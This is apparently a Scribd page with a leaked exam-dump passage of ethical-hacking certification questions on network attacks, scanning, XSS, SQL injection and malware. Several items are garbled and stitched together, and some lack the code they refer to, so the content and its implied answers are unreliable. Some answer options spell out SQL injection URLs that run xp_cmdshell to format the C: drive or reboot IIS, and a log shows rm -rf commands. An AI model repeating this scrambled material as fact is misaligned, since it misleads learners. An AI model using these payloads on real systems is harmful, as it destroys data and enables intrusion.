P. 1
final_Pass4Sure

final_Pass4Sure

|Views: 586|Likes:
Published by JueySlamat

More info:

Published by: JueySlamat on Mar 31, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

01/10/2012

pdf

text

original

Sections

  • QUESTION 1:
  • QUESTION 2:
  • QUESTION 3:
  • QUESTION 4:
  • QUESTION 5:
  • QUESTION 14:
  • QUESTION 30:
  • QUESTION 33:
  • QUESTION 35:
  • QUESTION 49:
  • QUESTION 77:
  • QUESTION 78:
  • QUESTION 80:
  • QUESTION 83:
  • QUESTION 86:
  • QUESTION 89:
  • QUESTION 91:
  • QUESTION 98:
  • QUESTION 99:
  • QUESTION 122:
  • QUESTION 123:
  • QUESTION 124:
  • QUESTION 132:
  • QUESTION 140:
  • QUESTION 158:
  • QUESTION 159:
  • QUESTION 160:
  • QUESTION 162:
  • QUESTION 166:
  • QUESTION 167:
  • QUESTION 170:
  • QUESTION 172:
  • QUESTION 173:
  • QUESTION 175:
  • QUESTION 203:
  • QUESTION 205:
  • QUESTION 208:
  • QUESTION 209:
  • QUESTION 210:
  • QUESTION 211:
  • QUESTION 222:
  • QUESTION 225:
  • QUESTION 231:
  • QUESTION 232:
  • QUESTION 236:
  • QUESTION 237:
  • QUESTION 238:
  • QUESTION 243:
  • QUESTION 244:
  • QUESTION 248:
  • QUESTION 249:
  • QUESTION 258:
  • QUESTION 261:
  • QUESTION 269:
  • QUESTION 276:
  • QUESTION 278:
  • QUESTION 284:
  • QUESTION 288:
  • QUESTION 291:
  • QUESTION 295:
  • QUESTION 298:
  • QUESTION 301:
  • QUESTION 310:
  • QUESTION 312:
  • QUESTION 318:
  • QUESTION 324:
  • QUESTION 326:
  • QUESTION 327:
  • QUESTION 329:
  • QUESTION 330:
  • QUESTION 333:
  • QUESTION 335:
  • QUESTION 358:
  • QUESTION 364:
  • QUESTION 366:
  • QUESTION 368:
  • QUESTION 370:
  • QUESTION 371:
  • QUESTION 383:
  • QUESTION 391:
  • QUESTION 392:
  • QUESTION 414:
  • QUESTION 415:
  • QUESTION 417:
  • QUESTION 418:
  • QUESTION 427:
  • QUESTION 429:
  • QUESTION 430:
  • QUESTION 431:
  • QUESTION 435:
  • QUESTION 454:
  • QUESTION 461:
  • QUESTION 463:
  • QUESTION 464:
  • QUESTION 479:
  • QUESTION 480:
  • QUESTION 485:
  • QUESTION 486:
  • QUESTION 487:
  • QUESTION 488:
  • QUESTION 489:
  • QUESTION 491:
  • QUESTION 494:
  • QUESTION 496:
  • QUESTION 497:
  • QUESTION 498:
  • QUESTION 499:
  • QUESTION 500:
  • QUESTION 501:
  • QUESTION 502:
  • QUESTION 505:
  • QUESTION 507:
  • QUESTION 509:
  • QUESTION 510:
  • QUESTION 513:
  • QUESTION 514:
  • QUESTION 515:
  • QUESTION 516:
  • QUESTION 518:
  • QUESTION 521:
  • QUESTION 522:
  • QUESTION 527:
  • QUESTION 529:
  • QUESTION 530:
  • QUESTION 535:
  • QUESTION 540:
  • QUESTION 541:
  • QUESTION 543:
  • QUESTION 544:
  • QUESTION 548:
  • QUESTION 549:
  • QUESTION 552:
  • QUESTION 554:
  • QUESTION 556:
  • QUESTION 557:
  • QUESTION 558:
  • QUESTION 561:
  • QUESTION 565:
  • QUESTION 569:
  • QUESTION 82:
  • QUESTION 129:
  • QUESTION 130:
  • QUESTION 147:
  • QUESTION 169:
  • QUESTION 206:
  • QUESTION 230:
  • QUESTION 275:
  • QUESTION 303:
  • QUESTION 328:
  • QUESTION 424:
  • QUESTION 450:
  • QUESTION 460:
  • QUESTION 465:
  • QUESTION 481:
  • QUESTION 482:
  • QUESTION 483:
  • QUESTION 484:
  • QUESTION 493:
  • QUESTION 504:
  • QUESTION 506:
  • QUESTION 523:
  • QUESTION 528:
  • QUESTION 555:
  • QUESTION 567:
  • QUESTION 596:
  • QUESTION 594:
  • QUESTION 590:
  • QUESTION 589:
  • QUESTION 588:
  • QUESTION 584:
  • QUESTION 536:
  • QUESTION 517:
  • QUESTION 165:
  • QUESTION 421:
  • QUESTION 467:
  • QUESTION 490:
  • QUESTION 570:
  • QUESTION 402
  • QUESTION 403
  • QUESTION 404
  • QUESTION 405
  • QUESTION 406
  • QUESTION 407
  • QUESTION 408
  • QUESTION 409
  • QUESTION 410
  • QUESTION 411
  • QUESTION 412
  • QUESTION 413
  • QUESTION 414
  • QUESTION 415
  • QUESTION 416
  • QUESTION 417
  • QUESTION 418
  • QUESTION 419
  • QUESTION 420
  • QUESTION 421
  • QUESTION 422
  • QUESTION 423
  • QUESTION 424
  • QUESTION 425
  • QUESTION 427
  • QUESTION 428
  • QUESTION 429
  • QUESTION 430
  • QUESTION 431
  • QUESTION 432
  • QUESTION 433
  • QUESTION 434
  • QUESTION 435
  • QUESTION 436
  • QUESTION 437
  • QUESTION 438
  • QUESTION 439
  • QUESTION 440
  • QUESTION 441
  • QUESTION 442
  • QUESTION 443
  • QUESTION 444
  • QUESTION 445
  • QUESTION 446
  • QUESTION 447
  • QUESTION 448
  • QUESTION 449
  • QUESTION 450
  • QUESTION 451
  • QUESTION 452
  • QUESTION 453
  • QUESTION 454
  • QUESTION 455
  • QUESTION 456
  • QUESTION 457
  • QUESTION 458
  • QUESTION 459
  • QUESTION 460
  • QUESTION 461
  • QUESTION 462
  • QUESTION 463
  • QUESTION 467
  • QUESTION 468
  • QUESTION 469
  • QUESTION 470
  • QUESTION 471
  • QUESTION 472
  • QUESTION 473
  • QUESTION 474
  • QUESTION 475
  • QUESTION 476
  • QUESTION 477
  • QUESTION 478
  • QUESTION 479
  • QUESTION 480
  • QUESTION 481
  • QUESTION 482
  • QUESTION 483
  • QUESTION 484
  • QUESTION 485
  • QUESTION 486
  • QUESTION 487
  • QUESTIYON 488
  • QUESTION 490
  • QUESTION 491
  • QUESTION 492
  • QUESTION 493
  • QUESTION 494
  • QUESTION 495
  • QUESTION 496
  • QUESTION 497
  • QUESTION 498
  • QUESTION 499
  • QUESTION 500
  • QUESTION 501
  • QUESTION 502
  • QUESTION 503
  • QUESTION 504
  • QUESTION 506
  • QUESTION 507
  • QUESTION 508
  • QUESTION 509
  • QUESTION 510
  • QUESTION 511
  • QUESTION 512
  • QUESTION 513
  • QUESTION 515
  • QUESTION 516
  • QUESTION 517
  • QUESTION 518
  • QUESTION 519
  • QUESTION 520
  • QUESTION 521
  • QUESTION 522
  • QUESTION 523
  • QUESTION 524
  • QUESTION 525
  • QUESTION 526
  • QUESTION 527
  • QUESTION 528
  • QUESTION 529
  • QUESTION 530
  • QUESTION 531
  • QUESTION 532
  • QUESTION 533
  • QUESTION 534
  • QUESTION 535
  • QUESTION 536
  • QUESTION 537
  • QUESTION 538
  • QUESTION 539
  • QUESTION 540
  • QUESTION 541
  • QUESTION 542
  • QUESTION 543
  • QUESTION 544
  • QUESTION 545
  • QUESTION 546
  • QUESTION 547
  • QUESTION 548
  • QUESTION 549
  • QUESTION 550

200 Clive has been monitoring his IDS and sees that there are a huge number of ICMP

Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause? A. Someone has spoofed Clive's IP address while doing a smurf attack. B. Someone has spoofed Clive's IP address while doing a land attack. C. Someone has spoofed Clive's IP address while doing a fraggle attack. D. Someone has spoofed Clive's IP address while doing a DoS attack. 201 Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the following lists the best options? A. RSA, LSA, POP B. SSID, WEP, Kerberos C. SMB, SMTP, Smart card D. Kerberos, Smart card, Stanford SRP 202 Which of the following encryption is not based on Block Cipher? A. DES B. Blowfish C. AES D. RC4 203 How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets. A. Session Splicing B. Session Stealing C. Session Hijacking D. Session Fragmentation 204 Hampton is the senior security analyst for the city of Columbus in Ohio. A . Bill connected to a Rogue access point B. Bill spoofed the MAC address of Dell laptop C. Toshiba and Dell laptops share the same hardware address D. Bill brute forced the Mac address ACLs 205 Hping2 is a powerful crafter tool that can be used to penetrate firewalls by creating custom TCP A – this command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.10.0.6 B- this command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 22 spoofing the IP address 192.168.0.9

1

C- this command will generate a multiple TCP SYN/ACK packet with source port 22, destination port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9 D - this command will generate a multiple TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.10.0.6 206 Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. He is confident that this rule will secure his network hackers on the Internet. But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use. Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder's attempts. Samuel wants to completely block hackers brute force attempts on his network. What are the alternatives to defending against possible brute-force password attacks on his site? A. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually C. Enforce complex password policy on your network so that passwords are more difficult to brute force D. You can't completely block the intruders attempt if they constantly switch proxies 207 Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? A. Snow B. Gif-It-Up C. NiceText D. Image Hide 208 Melissa is a virus that attacks Microsoft Windows platforms. To which category does this virus belong? A. Polymorphic B. Boot Sector infector C. System D. Macro 209 Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str)

2

where he should have ideally used printf(?s? str). What attack will his program expose the web application to? A. Cross Site Scripting B. SQL injection Attack C. Format String Attack D. Unicode Traversal Attack 211 You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results. You are unsure of which protocols are being used. You need to discover as many different protocols as possible. Which kind of scan would you use to achieve this? (Choose the best answer) A. Nessus scan with TCP based pings. B. Nmap scan with the -sP (Ping scan) switch. C. Netcat scan with the -u -e switches. D. Nmap with the -sO (Raw IP packets) switch. 212 Ports scans are often used to profile systems before they are attacked. Knowing what ports are open allows an attacker to determine which services can be attacked A – modify the kernel to never send reset(RST) packets B – block TCP/IP packets with FIN flag enabled at the firewall C- enable IDS signatures to block these scans D you cannot block a hacker from launching these scans on your network 213 Consider the following code: If an attacker can trick a victim user to click a link like this and the web application does not validate input, then the victim's browser will pop up an alert showing the users current set of cookies. An attacker can do much more damage, including stealing passwords, resetting your home page or redirecting the user to another web site. What is the countermeasure against XSS scripting? A. Create an IP access list and restrict connections based on port number B. Replace "<" and ">" characters with ?lt; and ?gt; using server scripts C. Disable Javascript in IE and Firefox browsers D. Connect to the server using HTTPS protocol instead of HTTP 214 An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts. A. 2 B. 256 C. 512 D. Over 10,000 215 Study the following e-mail message. When the link in the message is clicked, it will

3

htm. Which tool would you recommend from the list below? A. what do you infer 4 . Man in the middle attack 216 Which of the following is not considered to be a part of active sniffing? A. E-mail spoofing C.com A. MAC Duplicating 217 What is the expected result of the following exploit? A.xsecurity. If you could please take 5-10 minutes out of your online experience and renew your records you will not run into any future problems with the online service.supershopper. Once you have updated your account records your SuperShopper will not be interrupted and will continue as normal.com/in.xsecurity. However.supershopper. B. ARP Spoofing C. Opens up a telnet listener that requires no username or password. Creates a share called "sasfile" on the target system. social engineering D. Aircrack D.take you to an address like: http://hacker. C. frauds and spoof reports. Shmoo C.com is not an official SuperShopper site! What attack is depicted in the below e-mail? Dear SuperShopper valued member. You would like to recommend a tool that uses KoreK's implementation. Note that hacker. Please follow the link below and renew your account information. D. This notification expires within 24 hours. Create a FTP server with write permissions enabled. failure to update your records will result to your account cancellation. John the Ripper 219 Given the following extract from the snort log on a honeypot. Due to concerns.com/cgi-bin/webscr?cmd=update-run SuperShopper Technical Support http://www. SMAC Fueling D. MAC Flooding B. Phishing attack B.com. Creates an account with a user name of Anonymous and a password of noone@nowhere. It has come to our attention that your account information needs to be updated due to inactive members. https://www. Kismet B. 218 Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. for the safety and integrity of the SuperShopper community we have issued this warning message.

2004 CANSPAM Act B. nmap -sS -PT -PI -O -T1 <ip address> B. Password Guessing 224 Which of the following act in the united states specifically criminalizes the transmission of unsolicited commercial e-mail(SPAM) without an existing business relationship. Password Sniffing D. Which of the following commands will help you achieve this? A. nmap -sF -P0 -O <ip address> 221 How would Jeffrey access the wireless network? A – Sniff the wireless network and capture the ssid that is transmitted over the wire in plaintext B – Run wepcrack tool and brute force the ssid hashes C – Attempt to connect using wireless device default SSIDs D – Jam the wireless signal by launching denial of service attack 222 John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify which operating system is running on the remote host. A. nmap -sF -PT -PI -O <ip address> D. Spoofing B. Connect to the web server with an FTP client C. Session Hijacking C. 1990 Computer Misuse Act 5 . 2005 US-SPAM 1030 Act D. How could you use a web server to help in identifying the OS that is being used? A. nmap -sO -PT -O -C5 <ip address> C. Connect to the web server with a browser and look at the web page D. and you decide to slow your scans so that no one detects them.from the attack? A. A new port was opened B. 2003 SPAM Preventing Act C. The exploit was successful D. Telnet to an Open port and grab the banner B. The exploit was not successful 220 You are concerned that someone running PortSentry could block your scans. A new user id was created C. Telnet to port 8080 on the web server and look at the default page code 223 Which of the following attacks takes best advantage of an existing authenticated connection A.

True B. Fraggle C. He has enabled hardware and software firewalls. RSA D. The tool size of this ICMP packet once reconstructed is over 65. SYN Flood D. Blake is especially concerned about his since telnet can be a very large security risk in an organization. PGP 229 6 . there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Smurf B. what type of attack is Bryce attempting to perform? A. Grabbed the banner B. MD5 B. SSH C. False 227 Blake is in charge of securing all 20 of his company's servers.536 bytes. Unfortunately. A. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would line to tunnel the information to the remote end but does not have VPN capabilities to do so. Downloaded a file to his local computer C. Submitted a remote command to crash the server D.0 After pressing enter twice. Ping of Death 226 Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. hardened the operating systems and disabled all unnecessary service on all the servers.225 Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. Poisoned the local DNS cache of the server 228 Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. Blake is concerned about how his particular server might look to an outside attacker so he decides to perform some footprinting scanning and penetration tests on the server. Blake telents into the server and types the following command: HEAD/HTTP/1. From the information given. Which of the following tools can she use to protect the link? A. Blake gets the following results: What has the Blake just accomplished? A.

9 B.1 xor 1 =1 b. Encryption of agent communications will conceal the presence of the agents B.43. 192. Session Hijacking 7 . nfscopy 232 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A.23.0 xor 1 = 1 230 While examining a log report you find out that an intrusion has been attempted by a machine whose IP address is displayed as 3405906949.5.1 xor 0 =1 d. you want to grab a copy of it by sniffing.4 231 When Jason moves a file via NFS over the company's network. You perform a ping 3405906949. The monitor will know if counterfeit messages are being generated because they will not be encrypted C. They notice that there is excessive number of functions in the source code that might lead to buffer overflow? A9 B 17 C 20 D 32 E 35 234 Which of the following attacks takes best advantage of an existing authenticated connection A.Which òf the following exclusive Or transforms bits is not correct? a.0. 199. Which of the following tool accomplishes this? A. 10.0 xor 0 = 0 c. macof B.4.3. An intruder could intercept and delete data or alerts and the intrusion can go undetected 233 The programmers on your team are analyzing the free. Which of the following IP addresses will respond to the ping and hence will likely be responsible for the the intrusion ? A. It looks to you like a decimal number. Alerts are sent to the monitor when a potential intrusion is detected D. 203. open source software being used to run FTP services on a server in your organization. Spoofing B.5 D.2.4 C. webspy C. filesnarf D.34.

com. False 240 8 . Which TCP and UDP ports must you filter to check null sessions on your network? A. 137 and 443 C. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between point A and B? A. 137 and 139 B. B. True B. Having multiple computers each scan a small number of ports. C. SSL will mask the content of the packet and Intrusion Detection System will be blinded. then correlating the results 239 SNMP is a connectionless protocol that uses UDP instead of TCP packets? (True or False) A. Password Guessing 235 SSL has been seen as the solution to several common security problems. An understanding of the number of employees in the company C. You notice that they have jobs listed on a few Internet job-hunting sites. 236 Null sessions are un-authenticated connections (not using a username or password. There are two job postings for network and system administrators. SSL will slow down the IDS while it is breaking the encryption to see the packet content. 238 A distributed port scan operates by: A. Blocking access to the targeted host by each of the distributed scanning clients D. How can this help you in footprint the organization? A. 139 and 443 D. Administrators will often make use of SSL to encrypt communication from point A to point B. The types of operating systems and applications being used. Using denial-of-service software against a range of TCP ports C. Blocking access to the scanning clients by the targeted host B. 139 and 445 237 You are gathering competitive intelligence on Certkiller . The IP range used by the target network B. SSL will trigger rules at regular interval and force the administrator to turn them off. SSL is redundant if you already have IDS in place.C. How strong the corporate security policy is D. Password Sniffing D.) to an NT or 2000 system. D.

It is done by well known hackers and in movies as well. Online Attack B. you come to know that they are enforcing strong passwords. host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag. With your existing knowledge of users. A. Using social engineering. True B. However. It is not considered illegal. Dictionary Attack 9 . However. capital letters. False 243 Larry is a criminal hacker with over 20years of experience in breaking into systems….Why is Social Engineering considered attractive by hackers and also adopted by experts in the field? A. numbers and special characters. 241 The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). All passwords must also use 3 of the 4 following categories: lower case letters. C. It is easy and extremely effective to gain information. True B. what would be the fastest type of password cracking attack you can run against these hash values and still get results? A. This flag releases the connection resources. B. likely user account names and the possibility that they will choose the easiest passwords possible. It does not require a computer in order to commit a crime. You understand that all users are required to use passwords that are at least 8 characters in length. A. D. What tool could larry use to help evade traps like honeypots? A – send-sage proxy server B honeyd evasion server C KFsensor tunneling server D specter relay server 243 You have retrieved the raw hash values from a Windows 2000 Domain Controller. This flag releases the connection resources. host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag. False 242 The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection).

True IDS Sensors to look for large amount of ARP traffic on local subnets C. Brute Force Attack D. A – intercept the communication between the client and the server and change the cookie to make the server believe that there is a user with higher privileges B brute force the encryption used by the cookie and replay it back to the server C – inject the cookie ID into the web url and connect back to the server Steve scans the network for SNMP enabled devices. 150 C. 247 You have installed antivirus software and you want to be sure that your AV signatures are working correctly. Which port number Steve should scan? A. The zombie you are using is not truly idle.COM. During your scanning you notice that almost every query increments the IPID regardless of the port being queried.C. B. D. your antivirus program springs into action whenever you attempt to open. type the following code in notepad and save the file as EICAR. run or copy it X50!P%@AP[4\PZX54(P^)7cc)7}$SAVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 248 You are manually conducting Idle Scanning using Hping2. 249 How do you defend against ARP spoofing? A. One or two of the queries cause the IPID to increment by more than one value. workstation and routers B. To verify information about the mail administrator and his address. 161 D. D. To gather information about internal hosts used in email treatment. Place static ARP entries on servers. These ports are actually open on the target system. Hybrid Attack 244 Pearls productions. C. Use private VLANS 10 . 169 246 Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company? A. Why do you think this occurs? A. A . To create a denial of service attack. B. A stateful inspection firewall is resetting your queries. To gather information about procedures that are in place to deal with such messages. C. 69 B. Hping2 cannot be used for idle scanning.

rm /sbin/por359 ? 00:00:00 inetd rm: cannot remove `/sbin/portmap': No such file or directory rm: cannot remove `/tmp/h': No such file or directory >rm: cannot remove `/usr/sbin/rpc. rm/sbin/portmap . rm rf/root/. he notices that it is not running nearly as fast as it used to.c [root@apollo /]# [root@apollo /]# ps -aux | grep inetd .bash_history . rm /tmp/h . which is why he bought the new computer. After about two months of working on his new computer. rm -rf . even when he has not been on the Internet. ps -aux | grep portmap . Travis computer is even more noticeable slow. He analyzes the logfiles to investigate the attack.bash* . Every once in awhile. Use ARPWALL system and block ARP spoofing attacks 250 What type of attack is shown in the above diagram? A. His network was recently compromised. The hacker is attempting to compromise more machines on the network 252 Travis works primarily from home as a medical transcriptions. ps -aux | grep portmap .bash_history . rm -rf . ps -aux | grep portmap . rm /sbin/portmap .rf /usr/sbin/namedps -aux | grep inetd . Travis is really worried about his computer because he spent a lot of money on it and he depends on it to work. The hacker is trying to cover his tracks C. The hacker is running a buffer overflow exploit to lock down the system D.rf /usr/sbin/namedps -aux | grep inetd . ps -aux | grep portmap . What is the hacker trying to accomplish here? [root@apollo /]# rm rootkit.portmap': No such file or directory [root@apollo /]# ps -aux | grep portmap [root@apollo /]# [root@apollo /]# ps -aux | grep inetd . rm /usr/sbin/rpc. He has seen these windows show up.D. Identity Stealing Attack C.portmap': No such file or directory [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory A. Man-in-the-Middle (MiTM) Attack 251 John is the network administrator of XSECURITY systems. The hacker is planting a rootkit B. rm . rm /tmp/h . He uses voice recognition software is processor intensive. anti-spyware software and always keeps the computer up-to-date with Microsoft patches. rm /sbin/por359 ? 00:00:00 inetd 359 ? 00:00:00 inetd rm: cannot remove `/tmp/h': No such file or directory rm: cannot remove `/usr/sbin/rpc. but they quickly disappear. Travis scans his 11 .bash* . rm -rf /root/.portmap . rm /usr/sbin/rpc. Session Hijacking Attack D. Travis also notices a window or two pop-up on his screen. Travis uses antivirus software. SSL Spoofing Attack B. Travis frequently has to get on the Internet to do research on what he is working on.portmap . After another month of working on the computer. The hacker compromised and "owned" a Linux machine. rm . He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM. Take a look at the following Linux logfile snippet.

she gets an error message stating that the page can't be reached. Change the settings on the firewall all outbound traffic on port 80 D. Sniffer. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space D. it can also be used for a few other purposes as well. Since has drive is a 200 GB hard drive. Change the settings on the firewall to allow all incoming traffic on port 80 C. Logic Bomb's triggered at random times creating hidden data consuming junk files 253 James is the lone IT technician for a small advertising agency in the Midwest … A genius B GFI LANGuard C Nmap D Snort 254 Snort is an open source Intrusion Detection system. Sniffer. Proxy D. According to his calculations. Use a Internet browser other than the one that Angela is currently using 256 12 . IDS. He spends over four hours pouring over the files and folders and can't find anything but before he gives up. Travis thinks this is very odd. Firewall. Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. her computer can't ping the education website back. What ca Angela's IT department do to get access to the education website? A. folder by folder to see if there is anything he can find. Travi's Computer is infected with Stealth Torjan Virus C. IDS. Packet Logger. IDS. IDS. Travis's Computer is infected with stealth kernel level rootkit B. Which of the choices below indicate the other features offered by Snort? A. Since Angela's computer is behind a corporate firewall. content inspector 255 Angela is trying to access an education website that requires a username and password to login. Sniffer B. She contacts the website's support team and they report that no one else is having any issues with the site. What is mostly likely the cause of Travi's problems? A. When Angela clicks on the link to access the login page. After handing the issue over to her company's IT department. he should have around 150 GB of free space. Sniffer C. However.through Windows Explorer and check out the file system. Change the IP on Angela's Computer to an address outside the firewall B. he notices that his computer only has about 10 GB of free space available. it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education's server.

1. The firewall is blocking all the scans to 192. Pings to 192. MS Blaster D.10 258 NetBIOS over TCP/IP allows files and/or printers to be shared over the network. Run nmap XMAS scan against 192.168. they are using UNIX based web servers. A basic nmap scan of 192. A UDP Scan D. b. SQL Slammer C.1.168. Run NULL TCP hping2 against 192.168. A Half Scan C.10 seems to hang without returning any information. antivirus software.1. Use NetScan Tools Pro to conduct the scan B.168. A .1. Which of the following type of scans would be the most accurate and reliable? A.168. choose the exploit against which this rule applies.10 D.10 C. such as expensive firewalls.1.10 don't get answered. A. The TCP Connect Scan 260 While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What should you do next? A. A untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain 257 You want to know whether a packet filter is in front of 192. antispam systems and intrusion detection/prevention tools in your company’s network. WebDav B. She is not concerned about being stealth at this point.10.they are using windows based web servers C they are not using a stateful inspection firewall D they are not using an intrusion detection system 261 Study the snort rule given below: From the options below. A 445 B 139 C 179 D 443 259 Nathalie would like to perform a reliable scan against a remote target. MyDoom 13 . A FIN Scan B.You went to great lengths to install all the necessary technologies to prevent attacks.1.168.

Identify the user context of the web application by running_ http://www.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '. You enter "anuthing or 1=1-" in the username filed of an authentication form. Reboot the web server by running: http://www. Usage of non standard programming languages. schools and lenders is carried out through email. he is looking for a low/no cost solution to encrypt email. -D. This company processes over 20. Bad permissions on files.example. RSA C. Richard wants to utilize email encryption agency-wide. 266 Giving the following exract from the snort log on a honey pot. Identify the database and table name by running: http://www.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'). -265 A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold.1))) > 109 C. Because of privacy laws that are in the process of being implemented.com/order/include_rsa.262 Richard is a network Administrator working at a student loan company in lowa. Most communication between the company. This is the output returned from the server.example. PGP B. What is the next step you should do? A. Much of the email communication used at his company contains sensitive information such as social security numbers. OTP 263 You are conducting pen-test against a company's website using SQL Injection techniques.com/order/include_rsa. D. What should Richard use? A. drop database myDB. The only problem for Richard is that his department only has couple of servers and they are utilized to their full capacity.example. Format the C: drive and delete the database by running: http://www. 3DES D. Since a server-based PKI is not an option for him. B. Bad quality assurance on software produced.com/order/include_rsa. For this reason.com/order/include_rsa_asp?pressReleaseID=5 AND USER_NAME() = 'dbo' B. What is the most common cause of buffer overflow in software today? A.example. C. High bandwidth and large number of users. what service is being exploited? 14 . Richard wants to get ahead of the game and become compliant before any sort of auditing occurs.000 students loan a year from colleges all over the state.

613 ms 2 ip68-98-176-1.830 ms 12 0.Level3.724 ms 3.21.207 ms 4 ip68-100-0-137.111 ms 13 0.1.net (68.wdc1.743 ms 16.edge1.net (68.17.29.net (209.nv.gar1.169 ms 14.1.bbr1.244.XL1.ALTER.948 ms ip68-100-0-1.98.41) 17.0.960 ms 19.317 ms 21.16.so-2-0-0.nv.177 ms 25.9.63.1.100.411 ms 19.0.nv. Footprinting B.net (209.182) 20.159.78) 21. Using hping2.so-6-0-0.NewYork1.cox. Snort B.NYC8.943 ms 14.334 ms 19.nv.1) 13.137) 17.63.1) 16.net (64.74) 27. Enumeration D.670 ms 20.1) 12.173) 14.176.level3.ALTER.254) 0.285 ms 0.227 ms 17.NYC4.NewYork1.98.512 ms 9 so-7-0-0.415 ms 8 so-0-1-0.4) 12.TL1.324 ms 13. argus C.170.net (67.NewYork1.254 (172.938 ms 10 so-4-0-0.nv.159.153) 30.12) 21.1. What is this process known as? A.244.Level3.NewYork1.440 ms 17.166 ms 204.gar2.1.0.202 ms 11 uunet-level3-oc48.439 ms 220.net (64.Level3.933 ms 20.553 ms 15.cox. You discover your target system is one hop beyond the firewall. you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024.247. Firewalking C. Tcpdump 268 You are attempting to map out the firewall policy for an organization.NET (152.16.133 ms 18.nv.203 ms 22.A fpt B ssh C telnet D smtp 267 Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files? A.958 ms 13. TCPflow D.858 ms 23.063 ms 20.1.net (68.176.net (209.108 ms 15 .416 ms 3 ip68-98-176-1.160.100.1) 16.NET (152.104 ms 7 unknown.938 ms 5 68.4 (68.nv.929 ms 24.nv.net (68.526 ms 18.1. Idle scanning 269 1 172.170 ms 6 so-6-0-0.1.Level3.Level3.cox.cox.

63.MIA4.333 ms You perform the above traceroute and notice that hops 19 and 20 both show the same IP address. A place robots.195.GW5. A Honeypot C.NET (152.ALTER. Henry is using a denial of service attack which is a valid threat used by an attacker C.net (65. What type of attack is Henry using? A. so as to prevent legitimate users from gaining access.MIA4.com/> (65.com <http://www. Henry is executing commands or viewing data outside the intended target path B.855 ms 20 www.14) 51.NET (152. C. A buffer under run exploit. A buffer overflow exploit.14 0.63.txt file in the root of your website with listing of directories that you don’t want to be crawled.055 ms 17 117.NET (152.63. A SUID exploit.189) 51.ATL5.73) 51.82.customer.86.ALTER.195.165 ms 49.ALTER. While it is effective.195.target.ATM6-0. An application proxying firewall You have been using the msadc. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands 272 www wanderers or spiders are programs that traverse many pages in the world wide web by recursively retrieving linked pages.XR1.280 ms 53.910 ms 15 0.NET (152.571 ms 56.pl attack script to execute arbitrary commands on an NT4 web server.935 ms 49. B place authentication on root directories that will prevent crawling from these spiders C enable SSL on restricted directories which will block these spiders from crawling 16 . Henry is taking advantage of an incorrect configuration that leads to access with higher-than-expected privilege D.921 ms 51.466 ms 16 0. A SQL injection exploit.22) 52.244 ms 33. A stateful inspection firewall D. On further research you come across a perl script that runs the following msadc functions: What kind of exploit is indicated by this script? A. A chained exploit. E.ALTER.com/> (65.target.TL1.855 ms 19 www.897 ms 50.so-7-0-0.191 ms 52. you find it tedious to perform extended functions.937 ms 49. B.894 ms 33.101.target.239.so-3-0-0.so-4-1-0.63.129) 37.XL1. This probably indicates what? A.MIA1.com <http://www.target.647 ms 18 target-gw1.239.alter. D.571 ms 56. A host based IDS B.121 ms 